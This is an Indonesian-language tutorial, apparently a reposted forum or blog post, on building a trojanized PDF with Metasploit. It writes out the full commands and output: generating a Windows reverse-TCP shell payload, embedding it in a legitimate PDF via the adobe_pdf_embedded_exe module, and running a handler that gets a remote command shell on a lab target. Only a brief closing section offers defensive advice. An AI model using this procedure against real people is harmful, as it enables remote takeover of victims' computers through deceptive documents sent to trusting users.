Ubuntu for PenTest - Client Side Attack with Evil .pdf
Ingin kembali melakukan repost dari tutorial sendiri di thread yang udah di-closed...
Spoiler for tutz:
Pada kesempatan kali ini, ane ingin coba sedikit berbagi trik dari sekian trik yang ada dalam Client Side Attack...
Inti serangan ini memanfaatkan kelemahan dari pengguna yang dijadikan target, misalnya terlalu percaya dengan kiriman dokumen2 yang tidak jelas atau tidak meng-update sistem keamanan yang ada pada komputer nya..
Quote:
Untuk bahan persiapan :
|
Code:
Pengujian dilakukan di dalam Virtual Machine... :) IP Attacker : 192.168.1.215 IP Target : 192.168.1.50
Code:
root:/opt/framework-3.7.0/msf3# msfpayload windows/shell/reverse_tcp LHOST=192.168.1.215 LPORT=443 X > /tmp/nama_program.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell/reverse_tcp
Length: 290
Options: LHOST=192.168.1.215,LPORT=443
*/
2. Lanjutkan dengan meng-copy-kan file .pdf yang asli ke direktori /tmp...
3. Lalu, masuk ke Metasploit :
Code:
root:/opt/framework-3.7.0/msf3# msfconsole[/quote] 4. Pada Metasploit, gunakan module adobe pdf embedded exe dan buat file fake.pdf nya (perhatikan saja langkahnya) : [quote]msf > use windows/fileformat/adobe_pdf_embedded_exe msf exploit(adobe_pdf_embedded_exe) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD => windows/shell/reverse_tcp msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.1.215 LHOST => 192.168.1.215 msf exploit(adobe_pdf_embedded_exe) > set LPORT 443 LPORT => 443 msf exploit(adobe_pdf_embedded_exe) > set EXENAME /tmp/nama_program.exe EXENAME => /tmp/payload.exe msf exploit(adobe_pdf_embedded_exe) > set FILENAME FakeFile.pdf FILENAME => FakeFile.pdf msf exploit(adobe_pdf_embedded_exe) > set INFILENAME /tmp/OriginalFile.pdf INFILENAME => /tmp/OriginalFile.pdf msf exploit(adobe_pdf_embedded_exe) > set OUTPUTPATH /tmp/ OUTPUTPATH => /tmp/ msf exploit(adobe_pdf_embedded_exe) > exploit Started reverse handler on 192.168.1.215:443 Reading in '/tmp/OriginalFile.pdf'... Parsing '/tmp/OriginalFile.pdf'... Parsing Successful. Using '/tmp/nama_program.exe' as payload... Creating 'FakeFile.pdf' file... Generated output file /tmp/FakeFile.pdf Exploit completed, but no session was created.
*/
5. Lanjutkan dengan menunggu target untuk membuka file FakeFile.pdf... Namun, persiapkan dulu hal ini :
Code:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.215
LHOST => 192.168.1.215
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit
Started reverse handler on 192.168.1.215:443
Starting the payload handler...
Sending stage (240 bytes) to 192.168.1.50
Command shell session 1 opened (192.168.1.215:443 -> 192.168.1.50:1042)
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop>
Untuk solusi penanganan hal ini :
Update lah selalu AntiVirus Anda... Simple kan?
Tanda2 mencurigakan dari file ini terletak pada saat kita membukanya... Saat kita buka file palsu ini, maka dia akan mengeluarkan warning ynag mengatakan file original nya tidak ada, apakah mau dipisah atau tidak... Dipisah di sini maksudnya melepas payload yang telah kita masukan sebelumnya ke file asli sehingga nanti akan keluar file aslinya tanpa payload di dalamnya...
Namun, ketika hal ini telah dilakukan, maka attacker telah berhasil masuk ke sistem target seperti yang telah dijelaskan di atas... Jadi, bila bertemu situasi seperti ini, lebih baik lupakan saja untuk membukanya atau buka dalam keadaan Anda tidak terhubung ke InterNet...
Tidak ada komentar:
Posting Komentar